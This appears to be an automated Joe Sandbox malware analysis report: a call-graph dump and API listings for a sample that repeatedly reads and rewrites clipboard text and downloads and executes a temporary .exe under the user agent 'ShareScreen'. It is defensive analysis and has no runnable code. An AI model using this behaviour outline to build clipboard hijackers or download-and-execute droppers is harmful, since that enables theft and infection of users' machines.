64214->64215 64220 42eae9 20 API calls __dosmaperr 64215->64220 64217 4334b0 GetLastError 64217->64213 64218->64210 64219->64209 64220->64217 64222 42dfec _Atexit 64221->64222 64223 42dff3 GetLastError ExitThread 64222->64223 64224 42e000 64222->64224 64237 431efa GetLastError 64224->64237 64226 42e005 64257 435591 64226->64257 64230 42e01b 64264 401169 64230->64264 64238 431f10 64237->64238 64239 431f16 64237->64239 64272 435131 11 API calls 2 library calls 64238->64272 64241 434d4a __Thrd_start 20 API calls 64239->64241 64243 431f65 SetLastError 64239->64243 64242 431f28 64241->64242 64244 431f30 64242->64244 64273 435187 11 API calls 2 library calls 64242->64273 64243->64226 64246 43348a _free 20 API calls 64244->64246 64248 431f36 64246->64248 64247 431f45 64247->64244 64249 431f4c 64247->64249 64250 431f71 SetLastError 64248->64250 64274 431d6c 20 API calls __dosmaperr 64249->64274 64275 42df9d 167 API calls 2 library calls 64250->64275 64252 431f57 64254 43348a _free 20 API calls 64252->64254 64256 431f5e 64254->64256 64255 431f7d 64256->64243 64256->64250 64258 4355b6 64257->64258 64259 4355ac 64257->64259 64276 434eb3 5 API calls 2 library calls 64258->64276 64261 40f8f4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 64259->64261 64263 42e010 64261->64263 64262 4355cd 64262->64259 64263->64230 64271 4354c4 10 API calls 2 library calls 64263->64271 64277 405825 64264->64277 64290 40155a Sleep 64264->64290 64265 401173 64268 42e1b9 64265->64268 64469 42e094 64268->64469 64270 42e1c6 64271->64230 64272->64239 64273->64247 64274->64252 64275->64255 64276->64262 64278 405831 Mailbox 64277->64278 64279 4010ea std::_Cnd_initX 35 API calls 64278->64279 64280 405846 __Cnd_signal 64279->64280 64281 40585e 64280->64281 64336 40ce57 28 API calls std::_Throw_Cpp_error 64280->64336 64283 401109 std::_Cnd_initX 28 API calls 64281->64283 64284 405867 64283->64284 64292 402a14 InternetOpenW 64284->64292 64308 4016e3 64284->64308 64287 40586e Mailbox std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 64287->64265 64291 4016d9 64290->64291 64293 402a47 InternetOpenUrlW 64292->64293 64294 402bbc 64292->64294 64293->64294 64295 402a5d GetTempPathW GetTempFileNameW 64293->64295 64297 40f8f4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 64294->64297 64337 42a8ae 64295->64337 64299 402bcb 64297->64299 64329 40e790 64299->64329 64300 402bab InternetCloseHandle InternetCloseHandle 64300->64294 64301 402ac8 __Getcvt 64302 402ae0 InternetReadFile WriteFile 64301->64302 64303 402b20 CloseHandle 64301->64303 64302->64301 64339 402980 64303->64339 64306 402b4b ShellExecuteExW 64306->64300 64307 402b92 WaitForSingleObject CloseHandle 64306->64307 64307->64300 64447 40fe0b 64308->64447 64310 4016ef Sleep 64448 40cc35 64310->64448 64313 40cc35 28 API calls 64314 401715 64313->64314 64315 40171f OpenClipboard 64314->64315 64316 401947 Sleep 64315->64316 64317 40172f GetClipboardData 64315->64317 64316->64315 64318 401941 CloseClipboard 64317->64318 64319 40173f GlobalLock 64317->64319 64318->64316 64319->64318 64323 40174c _strlen 64319->64323 64320 40cbec 28 API calls std::system_error::system_error 64320->64323 64321 40cc35 28 API calls 64321->64323 64323->64318 64323->64320 64323->64321 64324 4018d6 EmptyClipboard GlobalAlloc 64323->64324 64452 402e8b 167 API calls 2 library calls 64323->64452 64454 40cacb 26 API calls _Deallocate 64323->64454 64324->64323 64326 4018ef GlobalLock 64324->64326 64453 4269b0 64326->64453 64328 401909 GlobalUnlock SetClipboardData GlobalFree 64328->64323 64460 40df0f 64329->64460 64334 40e835 64334->64287 64335 40e7a7 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 64467 40df1b LeaveCriticalSection std::_Lockit::~_Lockit 64335->64467 64336->64281 64338 402a96 CreateFileW 64337->64338 64338->64300 64338->64301 64340 4029ab __Getcvt _wcslen 64339->64340 64349 42b474 64340->64349 64344 4029d8 64371 404358 64344->64371 64347 40f8f4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 64348 402a12 64347->64348 64348->64300 64348->64306 64375 42b126 64349->64375 64352 402843 64353 402852 Mailbox 64352->64353 64401 403302 64353->64401 64355 402866 64417 403bb0 64355->64417 64357 40287a 64358 4028a8 64357->64358 64359 40288c 64357->64359 64423 403137 64358->64423 64444 4032bf 167 API calls 64359->64444 64362 4028b5 64426 403c45 64362->64426 64364 4028c7 64436 403ce7 64364->64436 64366 4028e4 64368 404358 26 API calls 64366->64368 64367 40289f std::ios_base::_Ios_base_dtor Mailbox 64367->64344 64369 402903 64368->64369 64445 4032bf 167 API calls 64369->64445 64372 404360 64371->64372 64373 402a04 64371->64373 64446 40ccbb 26 API calls 2 library calls 64372->64446 64373->64347 64376 42b153 64375->64376 64377 42b157 64376->64377 64378 42b162 64376->64378 64379 42b17a 64376->64379 64382 40f8f4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 64377->64382 64380 42eae9 __dosmaperr 20 API calls 64378->64380 64381 42a767 __fassign 162 API calls 64379->64381 64383 42b167 64380->64383 64384 42b185 64381->64384 64385 4029c4 64382->64385 64386 42a5bd __fassign 26 API calls 64383->64386 64387 42b190 64384->64387 64388 42b327 64384->64388 64385->64352 64386->64377 64390 42b238 WideCharToMultiByte 64387->64390 64394 42b19b 64387->64394 64398 42b1d5 WideCharToMultiByte 64387->64398 64389 42b354 WideCharToMultiByte 64388->64389 64396 42b332 64388->64396 64389->64396 64391 42b263 64390->64391 64390->64394 64391->64394 64395 42b26c GetLastError 64391->64395 64392 42eae9 __dosmaperr 20 API calls 64392->64377 64394->64377 64397 42eae9 __dosmaperr 20 API calls 64394->64397 64395->64394 64400 42b27b 64395->64400 64396->64377 64396->64392 64397->64377 64398->64394 64399 42b294 WideCharToMultiByte 64399->64396 64399->64400 64400->64377 64400->64396 64400->64399 64402 40330e Mailbox 64401->64402 64403 4046a1 167 API calls 64402->64403 64404 40333a 64403->64404 64405 404872 167 API calls 64404->64405 64406 403363 64405->64406 64407 4045b1 26 API calls 64406->64407 64408 403372 64407->64408 64409 4033b7 std::ios_base::_Ios_base_dtor 64408->64409 64410 40de08 167 API calls 64408->64410 64411 4033f3 Mailbox 64409->64411 64413 40c63d 167 API calls 64409->64413 64412 403387 64410->64412 64411->64355 64412->64409 64414 4045b1 26 API calls 64412->64414 64413->64411 64415 403398 64414->64415 64416 404c39 167 API calls 64415->64416 64416->64409 64418 403bbc Mailbox 64417->64418 64419 4042d4 167 API calls 64418->64419 64420 403bc8 64419->64420 64421 403bec Mailbox 64420->64421 64422 403520 167 API calls 64420->64422 64421->64357 64422->64421 64424 40437b 28 API calls 64423->64424 64425 403151 __Getcvt 64424->64425 64425->64362 64427 403c51 Mailbox 64426->64427 64428 40c63d 167 API calls 64427->64428 64429 403c74 64428->64429 64430 4042d4 167 API calls 64429->64430 64431 403c7e 64430->64431 64433 403cc1 Mailbox 64431->64433 64435 403520 167 API calls 64431->64435 64432 403c9f 64432->64433 64434 4046ef 167 API calls 64432->64434 64433->64364 64434->64433 64435->64432 64437 403cf3 __EH_prolog3_catch 64436->64437 64438 4042d4 167 API calls 64437->64438 64440 403d0c 64438->64440 64439 4046ef 167 API calls 64442 403d95 Mailbox 64439->64442 64441 403d3c 64440->64441 64443 4036c4 40 API calls 64440->64443 64441->64439 64442->64366 64443->64441 64444->64367 64445->64367 64446->64373 64447->64310 64449 40cc51 _strlen 64448->64449 64455 40cbec 64449->64455 64451 401708 64451->64313 64452->64323 64453->64328 64454->64323 64456 40cc1f 64455->64456 64458 40cbfb BuildCatchObjectHelperInternal 64455->64458 64459 40cb81 28 API calls 4 library calls 64456->64459 64458->64451 64459->64458 64468 40f24f EnterCriticalSection 64460->64468 64462 40df19 64463 40cebe GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 64462->64463 64464 40cef7 64463->64464 64465 40ceec CloseHandle 64463->64465 64466 40cefb GetCurrentThreadId 64464->64466 64465->64466 64466->64335 64467->64334 64468->64462 64478 431f7e GetLastError 64469->64478 64471 42e0a3 ExitThread 64472 42e0c1 64475 42e0cd CloseHandle 64472->64475 64476 42e0d4 64472->64476 64475->64476 64476->64471 64477 42e0e0 FreeLibraryAndExitThread 64476->64477 64479 431f97 64478->64479 64483 431f9d 64478->64483 64498 435131 11 API calls 2 library calls 64479->64498 64480 434d4a __Thrd_start 17 API calls 64482 431faf 64480->64482 64485 431fb7 64482->64485 64499 435187 11 API calls 2 library calls 64482->64499 64483->64480 64484 431ff4 SetLastError 64483->64484 64486 42e09f 64484->64486 64488 43348a _free 17 API calls 64485->64488 64486->64471 64486->64472 64497 435516 10 API calls 2 library calls 64486->64497 64490 431fbd 64488->64490 64489 431fcc 64489->64485 64491 431fd3 64489->64491 64492 431feb SetLastError 64490->64492 64500 431d6c 20 API calls __dosmaperr 64491->64500 64492->64486 64494 431fde 64495 43348a _free 17 API calls 64494->64495 64496 431fe4 64495->64496 64496->64484 64496->64492 64497->64472 64498->64483 64499->64489 64500->64494 64501->64135 64502 402c24 InternetOpenW 64503 402e7a 64502->64503 64506 402c57 __Getcvt 64502->64506 64504 40f8f4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 64503->64504 64505 402e89 64504->64505 64514 42df1d 64506->64514 64509 42df1d std::_Locinfo::_Locinfo_dtor 26 API calls 64510 402e3c 64509->64510 64511 42df1d std::_Locinfo::_Locinfo_dtor 26 API calls 64510->64511 64512 402e4e InternetOpenUrlW 64511->64512 64512->64503 64513 402e69 InternetCloseHandle InternetCloseHandle 64512->64513 64513->64503 64515 42df2c 64514->64515 64517 42df3a 64514->64517 64515->64517 64521 42df6a 64515->64521 64523 42eae9 20 API calls __dosmaperr 64517->64523 64518 42df44 64524 42a5bd 26 API calls _Deallocate 64518->64524 64520 402e2e 64520->64509 64521->64520 64525 42eae9 20 API calls __dosmaperr 64521->64525 64523->64518 64524->64520 64525->64518 64526 4327a5 64531 432573 64526->64531 64529 4327cd 64532 43259e 64531->64532 64542 4326e7 64532->64542 64546 43c8ee 170 API calls 2 library calls 64532->64546 64534 432791 64550 42a5bd 26 API calls _Deallocate 64534->64550 64536 4326f0 64536->64529 64543 43d03c 64536->64543 64538 432731 64538->64542 64547 43c8ee 170 API calls 2 library calls 64538->64547 64540 432750 64540->64542 64548 43c8ee 170 API calls 2 library calls 64540->64548 64542->64536 64549 42eae9 20 API calls __dosmaperr 64542->64549 64551 43ca11 64543->64551 64545 43d057 64545->64529 64546->64538 64547->64540 64548->64542 64549->64534 64550->64536 64554 43ca1d BuildCatchObjectHelperInternal 64551->64554 64552 43ca2b 64569 42eae9 20 API calls __dosmaperr 64552->64569 64554->64552 64556 43ca64 64554->64556 64555 43ca30 64570 42a5bd 26 API calls _Deallocate 64555->64570 64562 43cfeb 64556->64562 64561 43ca3a __wsopen_s 64561->64545 64572 43f961 64562->64572 64567 43348a _free 20 API calls 64568 43ca88 64567->64568 64571 43cab1 LeaveCriticalSection __wsopen_s 64568->64571 64569->64555 64570->64561 64571->64561 64573 43f984 64572->64573 64574 43f96d 64572->64574 64575 43f9a3 64573->64575 64576 43f98c 64573->64576 64642 42eae9 20 API calls __dosmaperr 64574->64642 64646 434fca 10 API calls 2 library calls 64575->64646 64644 42eae9 20 API calls __dosmaperr 64576->64644 64580 43f972 64643 42a5bd 26 API calls _Deallocate 64580->64643 64581 43f991 64645 42a5bd 26 API calls _Deallocate 64581->64645 64582 43f9aa MultiByteToWideChar 64585 43f9d9 64582->64585 64586 43f9c9 GetLastError 64582->64586 64648 4336c7 21 API calls 3 library calls 64585->64648 64647 42eab3 20 API calls __dosmaperr 64586->64647 64589 43d001 64589->64568 64596 43d05c 64589->64596 64590 43f9e1 64591 43fa09 64590->64591 64592 43f9e8 MultiByteToWideChar 64590->64592 64594 43348a _free 20 API calls 64591->64594 64592->64591 64593 43f9fd GetLastError 64592->64593 64649 42eab3 20 API calls __dosmaperr 64593->64649 64594->64589 64597 43d079 64596->64597 64598 43d0a7 64597->64598 64599 43d08e 64597->64599 64650 43979e 64598->64650 64664 42ead6 20 API calls __dosmaperr 64599->64664 64602 43d093 64665 42eae9 20 API calls __dosmaperr 64602->64665 64603 43d0ac 64604 43d0b5 64603->64604 64605 43d0cc 64603->64605 64666 42ead6 20 API calls __dosmaperr 64604->64666 64663 43cd2a CreateFileW 64605->64663 64609 43d0ba 64667 42eae9 20 API calls __dosmaperr 64609->64667 64610 43d182 GetFileType 64613 43d1d4 64610->64613 64614 43d18d GetLastError 64610->64614 64612 43d157 GetLastError 64669 42eab3 20 API calls __dosmaperr 64612->64669 64672 4396e7 21 API calls 2 library calls 64613->64672 64670 42eab3 20 API calls __dosmaperr 64614->64670 64615 43d105 64615->64610 64615->64612 64668 43cd2a CreateFileW 64615->64668 64619 43d19b CloseHandle 64619->64602 64622 43d1c4 64619->64622 64621 43d14a 64621->64610 64621->64612 64671 42eae9 20 API calls __dosmaperr 64622->64671 64624 43d1f5 64628 43d241 64624->64628 64673 43cf3b 169 API calls 3 library calls 64624->64673 64625 43d1c9 64625->64602 64630 43d26e 64628->64630 64674 43cadd 167 API calls 4 library calls 64628->64674 64629 43d267 64629->64630 64631 43d27f 64629->64631 64675 4335ed 29 API calls 2 library calls 64630->64675 64633 43d029 64631->64633 64634 43d2fd CloseHandle 64631->64634 64633->64567 64676 43cd2a CreateFileW 64634->64676 64636 43d328 64637 43d332 GetLastError 64636->64637 64638 43d277 64636->64638 64677 42eab3 20 API calls __dosmaperr 64637->64677 64638->64633 64640 43d33e 64678 4398b0 21 API calls 2 library calls 64640->64678 64642->64580 64643->64589 64644->64581 64645->64589 64646->64582 64647->64589 64648->64590 64649->64591 64651 4397aa BuildCatchObjectHelperInternal 64650->64651 64679 42e40d EnterCriticalSection 64651->64679 64653 4397b1 64655 4397d6 64653->64655 64659 439844 EnterCriticalSection 64653->64659 64661 4397f8 64653->64661 64683 43957d 21 API calls 3 library calls 64655->64683 64657 4397db 64657->64661 64684 4396c4 EnterCriticalSection 64657->64684 64658 439821 __wsopen_s 64658->64603 64659->64661 64662 439851 LeaveCriticalSection 64659->64662 64680 4398a7 64661->64680 64662->64653 64663->64615 64664->64602 64665->64633 64666->64609 64667->64602 64668->64621 64669->64602 64670->64619 64671->64625 64672->64624 64673->64628 64674->64629 64675->64638 64676->64636 64677->64640 64678->64638 64679->64653 64685 42e455 LeaveCriticalSection 64680->64685 64682 4398ae 64682->64658 64683->64657 64684->64661 64685->64682 64686 43412a 64687 434136 BuildCatchObjectHelperInternal 64686->64687 64688 434142 64687->64688 64689 434159 64687->64689 64720 42eae9 20 API calls __dosmaperr 64688->64720 64699 42cb1f EnterCriticalSection 64689->64699 64692 434147 64721 42a5bd 26 API calls _Deallocate 64692->64721 64693 434169 64700 4341a6 64693->64700 64696 434175 64722 43419c LeaveCriticalSection __fread_nolock 64696->64722 64698 434152 __wsopen_s 64699->64693 64701 4341b4 64700->64701 64702 4341ce 64700->64702 64733 42eae9 20 API calls __dosmaperr 64701->64733 64723 432928 64702->64723 64705 4341d7 64730 4347f3 64705->64730 64706 4341b9 64734 42a5bd 26 API calls _Deallocate 64706->64734 64709 4341c4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 64709->64696 64711 4342db 64713 4342e8 64711->64713 64716 43428e 64711->64716 64712 43425f 64715 43427c 64712->64715 64712->64716 64736 42eae9 20 API calls __dosmaperr 64713->64736 64735 4344bf 31 API calls 4 library calls 64715->64735 64716->64709 64737 43433b 30 API calls 2 library calls 64716->64737 64718 434286 64718->64709 64720->64692 64721->64698 64722->64698 64724 432934 64723->64724 64725 432949 64723->64725 64738 42eae9 20 API calls __dosmaperr 64724->64738 64725->64705 64727 432939 64739 42a5bd 26 API calls _Deallocate 64727->64739 64729 432944 64729->64705 64740 434670 64730->64740 64732 4341f3 64732->64709 64732->64711 64732->64712 64733->64706 64734->64709 64735->64718 64736->64709 64737->64709 64738->64727 64739->64729 64741 43467c BuildCatchObjectHelperInternal 64740->64741 64742 434684 64741->64742 64743 43469c 64741->64743 64775 42ead6 20 API calls __dosmaperr 64742->64775 64745 434750 64743->64745 64750 4346d4 64743->64750 64780 42ead6 20 API calls __dosmaperr 64745->64780 64746 434689 64776 42eae9 20 API calls __dosmaperr 64746->64776 64749 434755 64781 42eae9 20 API calls __dosmaperr 64749->64781 64765 4396c4 EnterCriticalSection 64750->64765 64753 43475d 64782 42a5bd 26 API calls _Deallocate 64753->64782 64754 4346da 64756 434713 64754->64756 64757 4346fe 64754->64757 64766 434775 64756->64766 64777 42eae9 20 API calls __dosmaperr 64757->64777 64760 434703 64778 42ead6 20 API calls __dosmaperr 64760->64778 64761 434691 __wsopen_s 64761->64732 64762 43470e 64779 434748 LeaveCriticalSection __wsopen_s 64762->64779 64765->64754 64783 439941 64766->64783 64768 434787 64769 4347a0 SetFilePointerEx 64768->64769 64770 43478f 64768->64770 64772 434794 64769->64772 64773 4347b8 GetLastError 64769->64773 64796 42eae9 20 API calls __dosmaperr 64770->64796 64772->64762 64797 42eab3 20 API calls __dosmaperr 64773->64797 64775->64746 64776->64761 64777->64760 64778->64762 64779->64761 64780->64749 64781->64753 64782->64761 64784 43994e 64783->64784 64785 439963 64783->64785 64798 42ead6 20 API calls __dosmaperr 64784->64798 64789 439988 64785->64789 64800 42ead6 20 API calls __dosmaperr 64785->64800 64788 439953 64799 42eae9 20 API calls __dosmaperr 64788->64799 64789->64768 64790 439993 64801 42eae9 20 API calls __dosmaperr 64790->64801 64793 43995b 64793->64768 64794 43999b 64802 42a5bd 26 API calls _Deallocate 64794->64802 64796->64772 64797->64772 64798->64788 64799->64793 64800->64790 64801->64794 64802->64793 64803 4023ba 64804 402581 PostQuitMessage 64803->64804 64805 4023ce 64803->64805 64809 40257f 64804->64809 64806 4023d5 DefWindowProcW 64805->64806 64807 4023ec 64805->64807 64806->64809 64808 402a14 167 API calls 64807->64808 64807->64809 64808->64809 64810 40fc2b 64811 40fc37 BuildCatchObjectHelperInternal 64810->64811 64839 410018 64811->64839 64813 40fc3e 64814 40fd91 64813->64814 64819 40fc68 64813->64819 64860 4104f3 4 API calls 2 library calls 64814->64860 64816 40fd98 64861 42ffe9 28 API calls _Atexit 64816->64861 64818 40fd9e 64862 42ff9b 28 API calls _Atexit 64818->64862 64827 40fca7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 64819->64827 64854 42fd0e 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 64819->64854 64822 40fc81 64824 40fc87 64822->64824 64855 42fcb2 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 64822->64855 64823 40fda6 64826 40fd08 64850 41060d 64826->64850 64827->64826 64856 42a386 167 API calls 4 library calls 64827->64856 64830 40fd0e 64831 40fd23 64830->64831 64857 410643 GetModuleHandleW 64831->64857 64833 40fd2a 64833->64816 64834 40fd2e 64833->64834 64835 40fd37 64834->64835 64858 42ff8c 28 API calls _Atexit 64834->64858 64859 4101a7 13 API calls 2 library calls 64835->64859 64838 40fd3f 64838->64824 64840 410021 64839->64840 64863 41079b IsProcessorFeaturePresent 64840->64863 64842 41002d 64864 428847 10 API calls 3 library calls 64842->64864 64844 410032 64845 410036 64844->64845 64865 4317c1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64844->64865 64845->64813 64847 41003f 64848 41004d 64847->64848 64866 428870 8 API calls 3 library calls 64847->64866 64848->64813 64867 426850 64850->64867 64853 410633 64853->64830 64854->64822 64855->64827 64856->64826 64857->64833 64858->64835 64859->64838 64860->64816 64861->64818 64862->64823 64863->64842 64864->64844 64865->64847 64866->64845 64868 410620 GetStartupInfoW 64867->64868 64868->64853 64869 402bcd RegCreateKeyExW 64870 402bfb RegSetValueExW 64869->64870 64871 402c0f 64869->64871 64870->64871 64872 402c14 RegCloseKey 64871->64872 64873 402c1d 64871->64873 64872->64873 64874 4332fe 64875 43330b 64874->64875 64879 433323 64874->64879 64924 42eae9 20 API calls __dosmaperr 64875->64924 64877 433310 64925 42a5bd 26 API calls _Deallocate 64877->64925 64880 43337e 64879->64880 64888 43331b 64879->64888 64926 434ced 21 API calls 2 library calls 64879->64926 64882 432928 __fread_nolock 26 API calls 64880->64882 64883 433396 64882->64883 64894 432e36 64883->64894 64885 43339d 64886 432928 __fread_nolock 26 API calls 64885->64886 64885->64888 64887 4333c9 64886->64887 64887->64888 64889 432928 __fread_nolock 26 API calls 64887->64889 64890 4333d7 64889->64890 64890->64888 64891 432928 __fread_nolock 26 API calls 64890->64891 64892 4333e7 64891->64892 64893 432928 __fread_nolock 26 API calls 64892->64893 64893->64888 64895 432e42 BuildCatchObjectHelperInternal 64894->64895 64896 432e62 64895->64896 64897 432e4a 64895->64897 64899 432f28 64896->64899 64904 432e9b 64896->64904 64993 42ead6 20 API calls __dosmaperr 64897->64993 65000 42ead6 20 API calls __dosmaperr 64899->65000 64900 432e4f 64994 42eae9 20 API calls __dosmaperr 64900->64994 64902 432f2d 65001 42eae9 20 API calls __dosmaperr 64902->65001 64906 432eaa 64904->64906 64907 432ebf 64904->64907 64995 42ead6 20 API calls __dosmaperr 64906->64995 64927 4396c4 EnterCriticalSection 64907->64927 64909 432eb7 65002 42a5bd 26 API calls _Deallocate 64909->65002 64911 432ec5 64913 432ee1 64911->64913 64914 432ef6 64911->64914 64912 432eaf 64996 42eae9 20 API calls __dosmaperr 64912->64996 64997 42eae9 20 API calls __dosmaperr 64913->64997 64928 432f49 64914->64928 64916 432e57 __wsopen_s 64916->64885 64920 432ee6 64998 42ead6 20 API calls __dosmaperr 64920->64998 64921 432ef1 64999 432f20 LeaveCriticalSection __wsopen_s 64921->64999 64924->64877 64925->64888 64926->64880 64927->64911 64929 432f73 64928->64929 64930 432f5b 64928->64930 64932 4332dd 64929->64932 64937 432fb8 64929->64937 65012 42ead6 20 API calls __dosmaperr 64930->65012 65030 42ead6 20 API calls __dosmaperr 64932->65030 64933 432f60 65013 42eae9 20 API calls __dosmaperr 64933->65013 64936 4332e2 65031 42eae9 20 API calls __dosmaperr 64936->65031 64938 432f68 64937->64938 64940 432fc3 64937->64940 64944 432ff3 64937->64944 64938->64921 65014 42ead6 20 API calls __dosmaperr 64940->65014 64941 432fd0 65032 42a5bd 26 API calls _Deallocate 64941->65032 64943 432fc8 65015 42eae9 20 API calls __dosmaperr 64943->65015 64947 43300c 64944->64947 64948 433032 64944->64948 64949 43304e 64944->64949 64947->64948 64983 433019 64947->64983 65016 42ead6 20 API calls __dosmaperr 64948->65016 65019 4336c7 21 API calls 3 library calls 64949->65019 64951 433037 65017 42eae9 20 API calls __dosmaperr 64951->65017 64953 433065 64956 43348a _free 20 API calls 64953->64956 64959 43306e 64956->64959 64957 43303e 65018 42a5bd 26 API calls _Deallocate 64957->65018 64958 4331b7 64961 43322d 64958->64961 64964 4331d0 GetConsoleMode 64958->64964 64962 43348a _free 20 API calls 64959->64962 64963 433231 ReadFile 64961->64963 64965 433075 64962->64965 64966 4332a5 GetLastError 64963->64966 64967 43324b 64963->64967 64964->64961 64968 4331e1 64964->64968 64969 43309a 64965->64969 64970 43307f 64965->64970 64971 4332b2 64966->64971 64979 433209 64966->64979 64967->64966 64972 433222 64967->64972 64968->64963 64973 4331e7 ReadConsoleW 64968->64973 65022 43480e 64969->65022 65020 42eae9 20 API calls __dosmaperr 64970->65020 65028 42eae9 20 API calls __dosmaperr 64971->65028 64986 433270 64972->64986 64987 433287 64972->64987 64988 433049 __fread_nolock 64972->64988 64973->64972 64978 433203 GetLastError 64973->64978 64974 43348a _free 20 API calls 64974->64938 64978->64979 64979->64988 65025 42eab3 20 API calls __dosmaperr 64979->65025 64981 433084 65021 42ead6 20 API calls __dosmaperr 64981->65021 64982 4332b7 65029 42ead6 20 API calls __dosmaperr 64982->65029 65003 43d385 64983->65003 65026 432c65 31 API calls 2 library calls 64986->65026 64987->64988 64989 43329e 64987->64989 64988->64974 65027 432aa5 29 API calls __fread_nolock 64989->65027 64992 4332a3 64992->64988 64993->64900 64994->64916 64995->64912 64996->64909 64997->64920 64998->64921 64999->64916 65000->64902 65001->64909 65002->64916 65004 43d392 65003->65004 65005 43d39f 65003->65005 65033 42eae9 20 API calls __dosmaperr 65004->65033 65008 43d3ab 65005->65008 65034 42eae9 20 API calls __dosmaperr 65005->65034 65007 43d397 65007->64958 65008->64958 65010 43d3cc 65035 42a5bd 26 API calls _Deallocate 65010->65035 65012->64933 65013->64938 65014->64943 65015->64941 65016->64951 65017->64957 65018->64988 65019->64953 65020->64981 65021->64988 65023 434775 __fread_nolock 28 API calls 65022->65023 65024 434824 65023->65024 65024->64983 65025->64988 65026->64988 65027->64992 65028->64982 65029->64988 65030->64936 65031->64941 65032->64938 65033->65007 65034->65010 65035->65007

                                                                                    Executed Functions

                                                                                    Function 004016E3 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150clipboardsleepmemoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __EH_prolog3_GS.LIBCMT ref: 004016EA
                                                                                    • Sleep.KERNEL32(000011EB,0000004C), ref: 004016F4
                                                                                      • Part of subcall function 0040CC35: _strlen.LIBCMT ref: 0040CC4C
                                                                                    • OpenClipboard.USER32(00000000), ref: 00401721
                                                                                    • GetClipboardData.USER32(00000001), ref: 00401731
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00401740
                                                                                    • _strlen.LIBCMT ref: 0040174D
                                                                                    • _strlen.LIBCMT ref: 0040177C
                                                                                    • _strlen.LIBCMT ref: 004018C0
                                                                                    • EmptyClipboard.USER32 ref: 004018D6
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018E3
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00401901
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040190D
                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00401916
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0040191D
                                                                                    • CloseClipboard.USER32 ref: 00401941
                                                                                    • Sleep.KERNEL32(000002C7), ref: 0040194C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                    • String ID: i
                                                                                    • API String ID: 1583243082-3865851505
                                                                                    • Opcode ID: 62e215a5972df2954ee8547a1aec1863ca14d0d4ddbfcd9f91bb553889a70fc7
                                                                                    • Instruction ID: e8206cc808b01b97a457829c5c6b97d93370119956ebdbcfeaa79ca2656f34e0
                                                                                    • Opcode Fuzzy Hash: 62e215a5972df2954ee8547a1aec1863ca14d0d4ddbfcd9f91bb553889a70fc7
                                                                                    • Instruction Fuzzy Hash: EE51E431D00344DBE3119BA4ED46BAD7774FF2A306F04523AE805B62B2EB789A85C75D
                                                                                    Function 00402A14 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134networkfilesynchronizationCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A37
                                                                                    • InternetOpenUrlW.WININET(00000000,0045D830,00000000,00000000,00000000,00000000), ref: 00402A4D
                                                                                    • GetTempPathW.KERNEL32(00000105,?), ref: 00402A69
                                                                                    • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A7F
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402AB8
                                                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AF4
                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402B11
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00402B27
                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00402B88
                                                                                    • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B9D
                                                                                    • CloseHandle.KERNEL32(?), ref: 00402BA9
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402BB2
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00402BB5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                    • String ID: .exe$<$ShareScreen
                                                                                    • API String ID: 3323492106-493228180
                                                                                    • Opcode ID: cad18285665068766dab7c5d0808057bd44f811c01f48194dcd94531fdcff3d3
                                                                                    • Instruction ID: d8cef6b8be2db64f00d3760719452557403e9faa7f5bbaccd6a49820079d0072
                                                                                    • Opcode Fuzzy Hash: cad18285665068766dab7c5d0808057bd44f811c01f48194dcd94531fdcff3d3
                                                                                    • Instruction Fuzzy Hash: 3E41537190021CAEEB20DF50DD85FEAB7BCFF05745F0080FAA545A2190DEB49E858FA4
